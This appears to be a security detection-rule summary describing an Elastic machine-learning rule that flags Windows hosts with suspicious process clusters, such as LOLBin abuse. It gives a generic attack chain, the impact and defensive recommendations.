Host Detected with Suspicious Windows Process(es)

This detection identifies hosts with suspicious Windows processes exhibiting unusually high malicious probability scores, leveraging machine learning to detect potential masquerading tactics for defense evasion. The rule utilizes a combination of supervised and unsupervised ML models to flag unusual process clusters on a single host, possibly involving LOLbins. This approach aims to identify activity that may be resistant to detection using conventional search rules. The rule relies on the ‘problem_child_high_sum_by_host_ea’ machine learning job and requires a minimum Elastic Stack version of 9.4.0. The rule uses data ingested by the Elastic Defend or Winlogbeat integrations.

Attack Chain

1. Initial access is achieved through methods not specified in this source.
2. The attacker executes a legitimate Windows binary (LOLBin) such as cmd.exe, powershell.exe or certutil.exe.
3. The LOLBin is used to execute a malicious command or script.
4. The ProblemChild supervised ML model predicts that the process is malicious based on its behavior.
5. An unsupervised ML model analyzes the aggregate score of the process cluster, identifying it as unusually high.
6. The detection rule triggers, flagging the host as having suspicious processes.
7. The analyst reviews the alert and investigates the flagged processes.
8. The attacker continues their actions on the compromised host, potentially leading to data exfiltration or other malicious activities.

Impact

A successful attack using LOLBins and masquerading techniques can allow an attacker to evade traditional detection methods and gain unauthorized access to sensitive systems and data. This can lead to data breaches, financial loss, and reputational damage. While the number of victims is unknown, the sectors targeted include any organization utilizing Windows systems.

Recommendation

• Ensure the Living off the Land (LotL) Attack Detection integration assets are installed, along with Windows process events collected by Elastic Defend or Winlogbeat, as required by the setup instructions.
• Review the host name associated with the suspicious process cluster as described in the investigation guide.
• Examine the specific processes flagged by the ProblemChild supervised ML model to identify any known LOLbins as described in the investigation guide.
• Implement application whitelisting to prevent unauthorized or suspicious processes from executing, as mentioned in the response and remediation steps.